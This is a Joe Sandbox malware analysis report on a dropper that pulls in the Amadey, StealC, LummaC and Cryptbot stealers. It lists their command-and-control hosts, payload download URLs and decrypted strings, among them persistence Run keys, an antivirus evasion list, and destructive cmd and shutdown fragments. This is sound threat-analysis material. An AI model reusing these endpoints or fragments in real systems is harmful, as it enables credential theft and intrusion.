                                  2025-01-03T09:50:28.840129+010028033043Unknown Traffic192.168.2.449920135.181.65.21680TCP
                                  2025-01-03T09:50:53.905821+010028033043Unknown Traffic192.168.2.450065185.215.113.20680TCP
                                  2025-01-03T09:51:07.246569+010028033043Unknown Traffic192.168.2.450084185.215.113.20680TCP

                                  Joe Sandbox Signatures

                                  Click to jump to signature section

                                  Show All Signature Results

                                  AV Detection

                                  barindex
                                  Antivirus / Scanner detection for submitted sample
                                  Source: ebjtOH70jl.exeAvira: detected
                                  Antivirus detection for URL or domain
                                  Source: https://rabidcowse.shop/ve9taq_Avira URL Cloud: Label: malware
                                  Source: https://pancakedipyps.click/apiZAvira URL Cloud: Label: malware
                                  Source: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738Avira URL Cloud: Label: malware
                                  Source: https://rabidcowse.shop/apiNAvira URL Cloud: Label: malware
                                  Source: http://135.181.65.216/4a21a126be249f0d/vcruntime140.dll26be249f0d/nss3.dllAvira URL Cloud: Label: malware
                                  Source: https://rabidcowse.shop/apiXAvira URL Cloud: Label: malware
                                  Source: https://pancakedipyps.click/88Avira URL Cloud: Label: malware
                                  Source: https://rabidcowse.shop/apioAvira URL Cloud: Label: malware
                                  Source: home.fortth14vs.topAvira URL Cloud: Label: malware
                                  Source: https://pancakedipyps.click///mAvira URL Cloud: Label: malware
                                  Source: http://135.181.65.216/ee45b7c5e4cb75cb.php;AAvira URL Cloud: Label: malware
                                  Source: http://135.181.65.216/4a21a126be249f0d/nss3.dllqA;Avira URL Cloud: Label: malware
                                  Source: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738http://home.fortth14vs.top/gduZhxVRrNSTmMahAvira URL Cloud: Label: malware
                                  Source: http://135.181.65.216/4a21a126be249f0d/freebl3.dllkKAvira URL Cloud: Label: malware
                                  Source: http://185.215.113.16/inc/legs.exeAvira URL Cloud: Label: malware
                                  Antivirus detection for dropped file
                                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exeAvira: detection malicious, Label: HEUR/AGEN.1320706
                                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\stealc_valenciga[1].exeAvira: detection malicious, Label: TR/Crypt.ZPACK.Gen
                                  Source: C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exeAvira: detection malicious, Label: TR/Crypt.ZPACK.Gen
                                  Found malware configuration
                                  Source: 00000001.00000002.1768336160.0000000000671000.00000040.00000001.01000000.00000007.sdmpMalware Configuration Extractor: Amadey {"C2 url": "185.215.113.16/Jo89Ku7d/index.php", "Version": "4.41", "Install Folder": "44111dbc49", "Install File": "axplong.exe"}
                                  Source: 0000001A.00000002.2982325237.000000000159E000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/c4becf79229cb002.php"}
                                  Source: legs.exe.6408.10.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["energyaffai.lat", "discokeyus.lat", "sustainskelet.lat", "aspecteirs.lat", "rapeflowwj.lat", "necklacebudi.lat", "grannyejh.lat", "crosshuaht.lat", "pancakedipyps.click"], "Build id": "FATE99--dec"}
                                  Source: liddad.exe.6452.21.memstrminMalware Configuration Extractor: Cryptbot {"C2 list": ["home.fortth14vs.top", ".forhttpvs.top", "indohome.fortth14vs.top", "wgPhome.fortth14vs.top"]}
                                  Multi AV Scanner detection for dropped file
                                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\gold1111111111[1].exeReversingLabs: Detection: 65%
                                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\legs[1].exeReversingLabs: Detection: 95%
                                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\stealc_valenciga[1].exeReversingLabs: Detection: 100%
                                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\gold123[1].exeReversingLabs: Detection: 82%
                                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\am209[1].exeReversingLabs: Detection: 78%
                                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\liddad[1].exeReversingLabs: Detection: 44%
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeReversingLabs: Detection: 95%
                                  Source: C:\Users\user\AppData\Local\Temp\1004899001\am209.exeReversingLabs: Detection: 78%
                                  Source: C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exeReversingLabs: Detection: 100%
                                  Source: C:\Users\user\AppData\Local\Temp\1009574001\gold123.exeReversingLabs: Detection: 82%
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeReversingLabs: Detection: 65%
                                  Source: C:\Users\user\AppData\Local\Temp\1010458001\liddad.exeReversingLabs: Detection: 44%
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeReversingLabs: Detection: 63%
                                  Multi AV Scanner detection for submitted file
                                  Source: ebjtOH70jl.exeReversingLabs: Detection: 63%
                                  Source: ebjtOH70jl.exeVirustotal: Detection: 58%Perma Link
                                  AI detected suspicious sample
                                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                                  Machine Learning detection for dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1004899001\am209.exeJoe Sandbox ML: detected
                                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exeJoe Sandbox ML: detected
                                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\gold123[1].exeJoe Sandbox ML: detected
                                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exeJoe Sandbox ML: detected
                                  Source: C:\Users\user\AppData\Local\Temp\1009574001\gold123.exeJoe Sandbox ML: detected
                                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exeJoe Sandbox ML: detected
                                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exeJoe Sandbox ML: detected
                                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\gold1111111111[1].exeJoe Sandbox ML: detected
                                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\stealc_valenciga[1].exeJoe Sandbox ML: detected
                                  Source: C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exeJoe Sandbox ML: detected
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeJoe Sandbox ML: detected
                                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\am209[1].exeJoe Sandbox ML: detected
                                  Machine Learning detection for sample
                                  Source: ebjtOH70jl.exeJoe Sandbox ML: detected
                                  Sample uses string decryption to hide its real strings
                                  Source: 00000001.00000002.1768336160.0000000000671000.00000040.00000001.01000000.00000007.sdmpString decryptor: 185.215.113.16
                                  Source: 00000001.00000002.1768336160.0000000000671000.00000040.00000001.01000000.00000007.sdmpString decryptor: /Jo89Ku7d/index.php
                                  Source: 00000001.00000002.1768336160.0000000000671000.00000040.00000001.01000000.00000007.sdmpString decryptor: S-%lu-
                                  Source: 00000001.00000002.1768336160.0000000000671000.00000040.00000001.01000000.00000007.sdmpString decryptor: 44111dbc49
                                  Source: 00000001.00000002.1768336160.0000000000671000.00000040.00000001.01000000.00000007.sdmpString decryptor: axplong.exe
                                  Source: 00000001.00000002.1768336160.0000000000671000.00000040.00000001.01000000.00000007.sdmpString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
                                  Source: 00000001.00000002.1768336160.0000000000671000.00000040.00000001.01000000.00000007.sdmpString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                  Source: 00000001.00000002.1768336160.0000000000671000.00000040.00000001.01000000.00000007.sdmpString decryptor: Startup
                                  Source: 00000001.00000002.1768336160.0000000000671000.00000040.00000001.01000000.00000007.sdmpString decryptor: cmd /C RMDIR /s/q
                                  Source: 00000001.00000002.1768336160.0000000000671000.00000040.00000001.01000000.00000007.sdmpString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
                                  Source: 00000001.00000002.1768336160.0000000000671000.00000040.00000001.01000000.00000007.sdmpString decryptor: rundll32
                                  Source: 00000001.00000002.1768336160.0000000000671000.00000040.00000001.01000000.00000007.sdmpString decryptor: Programs
                                  Source: 00000001.00000002.1768336160.0000000000671000.00000040.00000001.01000000.00000007.sdmpString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                  Source: 00000001.00000002.1768336160.0000000000671000.00000040.00000001.01000000.00000007.sdmpString decryptor: %USERPROFILE%
                                  Source: 00000001.00000002.1768336160.0000000000671000.00000040.00000001.01000000.00000007.sdmpString decryptor: cred.dll|clip.dll|
                                  Source: 00000001.00000002.1768336160.0000000000671000.00000040.00000001.01000000.00000007.sdmpString decryptor: cred.dll
                                  Source: 00000001.00000002.1768336160.0000000000671000.00000040.00000001.01000000.00000007.sdmpString decryptor: clip.dll
                                  Source: 00000001.00000002.1768336160.0000000000671000.00000040.00000001.01000000.00000007.sdmpString decryptor: http://
                                  Source: 00000001.00000002.1768336160.0000000000671000.00000040.00000001.01000000.00000007.sdmpString decryptor: https://
                                  Source: 00000001.00000002.1768336160.0000000000671000.00000040.00000001.01000000.00000007.sdmpString decryptor: /quiet
                                  Source: 00000001.00000002.1768336160.0000000000671000.00000040.00000001.01000000.00000007.sdmpString decryptor: /Plugins/
                                  Source: 00000001.00000002.1768336160.0000000000671000.00000040.00000001.01000000.00000007.sdmpString decryptor: &unit=
                                  Source: 00000001.00000002.1768336160.0000000000671000.00000040.00000001.01000000.00000007.sdmpString decryptor: shell32.dll
                                  Source: 00000001.00000002.1768336160.0000000000671000.00000040.00000001.01000000.00000007.sdmpString decryptor: kernel32.dll
                                  Source: 00000001.00000002.1768336160.0000000000671000.00000040.00000001.01000000.00000007.sdmpString decryptor: GetNativeSystemInfo
                                  Source: 00000001.00000002.1768336160.0000000000671000.00000040.00000001.01000000.00000007.sdmpString decryptor: ProgramData\
                                  Source: 00000001.00000002.1768336160.0000000000671000.00000040.00000001.01000000.00000007.sdmpString decryptor: AVAST Software
                                  Source: 00000001.00000002.1768336160.0000000000671000.00000040.00000001.01000000.00000007.sdmpString decryptor: Kaspersky Lab
                                  Source: 00000001.00000002.1768336160.0000000000671000.00000040.00000001.01000000.00000007.sdmpString decryptor: Panda Security
                                  Source: 00000001.00000002.1768336160.0000000000671000.00000040.00000001.01000000.00000007.sdmpString decryptor: Doctor Web
                                  Source: 00000001.00000002.1768336160.0000000000671000.00000040.00000001.01000000.00000007.sdmpString decryptor: 360TotalSecurity
                                  Source: 00000001.00000002.1768336160.0000000000671000.00000040.00000001.01000000.00000007.sdmpString decryptor: Bitdefender
                                  Source: 00000001.00000002.1768336160.0000000000671000.00000040.00000001.01000000.00000007.sdmpString decryptor: Norton
                                  Source: 00000001.00000002.1768336160.0000000000671000.00000040.00000001.01000000.00000007.sdmpString decryptor: Sophos
                                  Source: 00000001.00000002.1768336160.0000000000671000.00000040.00000001.01000000.00000007.sdmpString decryptor: Comodo
                                  Source: 00000001.00000002.1768336160.0000000000671000.00000040.00000001.01000000.00000007.sdmpString decryptor: WinDefender
                                  Source: 00000001.00000002.1768336160.0000000000671000.00000040.00000001.01000000.00000007.sdmpString decryptor: 0123456789
                                  Source: 00000001.00000002.1768336160.0000000000671000.00000040.00000001.01000000.00000007.sdmpString decryptor: Content-Type: multipart/form-data; boundary=----
                                  Source: 00000001.00000002.1768336160.0000000000671000.00000040.00000001.01000000.00000007.sdmpString decryptor: ------
                                  Source: 00000001.00000002.1768336160.0000000000671000.00000040.00000001.01000000.00000007.sdmpString decryptor: ?scr=1
                                  Source: 00000001.00000002.1768336160.0000000000671000.00000040.00000001.01000000.00000007.sdmpString decryptor: Content-Type: application/x-www-form-urlencoded
                                  Source: 00000001.00000002.1768336160.0000000000671000.00000040.00000001.01000000.00000007.sdmpString decryptor: SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
                                  Source: 00000001.00000002.1768336160.0000000000671000.00000040.00000001.01000000.00000007.sdmpString decryptor: ComputerName
                                  Source: 00000001.00000002.1768336160.0000000000671000.00000040.00000001.01000000.00000007.sdmpString decryptor: abcdefghijklmnopqrstuvwxyz0123456789-_
                                  Source: 00000001.00000002.1768336160.0000000000671000.00000040.00000001.01000000.00000007.sdmpString decryptor: -unicode-
                                  Source: 00000001.00000002.1768336160.0000000000671000.00000040.00000001.01000000.00000007.sdmpString decryptor: SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\
                                  Source: 00000001.00000002.1768336160.0000000000671000.00000040.00000001.01000000.00000007.sdmpString decryptor: SYSTEM\ControlSet001\Services\BasicDisplay\Video
                                  Source: 00000001.00000002.1768336160.0000000000671000.00000040.00000001.01000000.00000007.sdmpString decryptor: VideoID
                                  Source: 00000001.00000002.1768336160.0000000000671000.00000040.00000001.01000000.00000007.sdmpString decryptor: DefaultSettings.XResolution
                                  Source: 00000001.00000002.1768336160.0000000000671000.00000040.00000001.01000000.00000007.sdmpString decryptor: DefaultSettings.YResolution
                                  Source: 00000001.00000002.1768336160.0000000000671000.00000040.00000001.01000000.00000007.sdmpString decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                  Source: 00000001.00000002.1768336160.0000000000671000.00000040.00000001.01000000.00000007.sdmpString decryptor: ProductName
                                  Source: 00000001.00000002.1768336160.0000000000671000.00000040.00000001.01000000.00000007.sdmpString decryptor: CurrentBuild
                                  Source: 00000001.00000002.1768336160.0000000000671000.00000040.00000001.01000000.00000007.sdmpString decryptor: rundll32.exe
                                  Source: 00000001.00000002.1768336160.0000000000671000.00000040.00000001.01000000.00000007.sdmpString decryptor: "taskkill /f /im "
                                  Source: 00000001.00000002.1768336160.0000000000671000.00000040.00000001.01000000.00000007.sdmpString decryptor: " && timeout 1 && del
                                  Source: 00000001.00000002.1768336160.0000000000671000.00000040.00000001.01000000.00000007.sdmpString decryptor: && Exit"
                                  Source: 00000001.00000002.1768336160.0000000000671000.00000040.00000001.01000000.00000007.sdmpString decryptor: " && ren
                                  Source: 00000001.00000002.1768336160.0000000000671000.00000040.00000001.01000000.00000007.sdmpString decryptor: Powershell.exe
                                  Source: 00000001.00000002.1768336160.0000000000671000.00000040.00000001.01000000.00000007.sdmpString decryptor: -executionpolicy remotesigned -File "
                                  Source: 00000001.00000002.1768336160.0000000000671000.00000040.00000001.01000000.00000007.sdmpString decryptor: shutdown -s -t 0
                                  Source: 00000001.00000002.1768336160.0000000000671000.00000040.00000001.01000000.00000007.sdmpString decryptor: random
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: INSERT_KEY_HERE
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: 07
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: 01
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: 20
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: 25
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: GetProcAddress
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: LoadLibraryA
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: lstrcatA
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: OpenEventA
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: CreateEventA
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: CloseHandle
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: Sleep
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: GetUserDefaultLangID
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: VirtualAllocExNuma
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: VirtualFree
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: GetSystemInfo
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: VirtualAlloc
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: HeapAlloc
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: GetComputerNameA
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: lstrcpyA
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: GetProcessHeap
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: GetCurrentProcess
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: lstrlenA
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: ExitProcess
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: GlobalMemoryStatusEx
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: GetSystemTime
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: SystemTimeToFileTime
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: advapi32.dll
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: gdi32.dll
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: user32.dll
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: crypt32.dll
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: GetUserNameA
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: CreateDCA
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: GetDeviceCaps
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: ReleaseDC
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: CryptStringToBinaryA
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: sscanf
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: VMwareVMware
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: HAL9TH
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: JohnDoe
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: DISPLAY
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: %hu/%hu/%hu
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: http://185.215.113.206
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: /c4becf79229cb002.php
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: /68b591d6548ec281/
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: stok
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: GetEnvironmentVariableA
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: GetFileAttributesA
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: HeapFree
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: GetFileSize
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: GlobalSize
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: CreateToolhelp32Snapshot
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: IsWow64Process
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: Process32Next
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: GetLocalTime
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: FreeLibrary
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: GetTimeZoneInformation
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: GetSystemPowerStatus
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: GetVolumeInformationA
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: GetWindowsDirectoryA
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: Process32First
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: GetLocaleInfoA
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: GetUserDefaultLocaleName
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: GetModuleFileNameA
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: DeleteFileA
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: FindNextFileA
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: LocalFree
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: FindClose
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: SetEnvironmentVariableA
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: LocalAlloc
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: GetFileSizeEx
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: ReadFile
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: SetFilePointer
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: WriteFile
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: CreateFileA
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: FindFirstFileA
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: CopyFileA
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: VirtualProtect
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: GetLogicalProcessorInformationEx
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: GetLastError
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: lstrcpynA
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: MultiByteToWideChar
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: GlobalFree
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: WideCharToMultiByte
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: GlobalAlloc
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: OpenProcess
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: TerminateProcess
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: GetCurrentProcessId
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: gdiplus.dll
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: ole32.dll
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: bcrypt.dll
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: wininet.dll
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: shlwapi.dll
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: shell32.dll
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: rstrtmgr.dll
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: CreateCompatibleBitmap
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: SelectObject
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: BitBlt
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: DeleteObject
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: CreateCompatibleDC
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: GdipGetImageEncodersSize
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: GdipGetImageEncoders
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: GdipCreateBitmapFromHBITMAP
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: GdiplusStartup
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: GdiplusShutdown
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: GdipSaveImageToStream
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: GdipDisposeImage
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: GdipFree
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: GetHGlobalFromStream
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: CreateStreamOnHGlobal
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: CoUninitialize
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: CoInitialize
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: CoCreateInstance
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: BCryptGenerateSymmetricKey
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: BCryptCloseAlgorithmProvider
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: BCryptDecrypt
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: BCryptSetProperty
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: BCryptDestroyKey
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: BCryptOpenAlgorithmProvider
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: GetWindowRect
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: GetDesktopWindow
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: GetDC
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: CloseWindow
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: wsprintfA
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: EnumDisplayDevicesA
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: GetKeyboardLayoutList
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: CharToOemW
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: wsprintfW
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: RegQueryValueExA
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: RegEnumKeyExA
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: RegOpenKeyExA
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: RegCloseKey
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: RegEnumValueA
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: CryptBinaryToStringA
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: CryptUnprotectData
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: SHGetFolderPathA
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: ShellExecuteExA
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: InternetOpenUrlA
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: InternetConnectA
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: InternetCloseHandle
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: HttpSendRequestA
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: HttpOpenRequestA
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: InternetReadFile
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: InternetCrackUrlA
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: StrCmpCA
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: StrStrA
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: StrCmpCW
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: PathMatchSpecA
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: GetModuleFileNameExA
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: RmStartSession
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: RmRegisterResources
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: RmGetList
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: RmEndSession
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: sqlite3_open
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: sqlite3_prepare_v2
                                  Source: 26.2.0d261d49cf.exe.b60000.0.unpackString decryptor: sqlite3_step
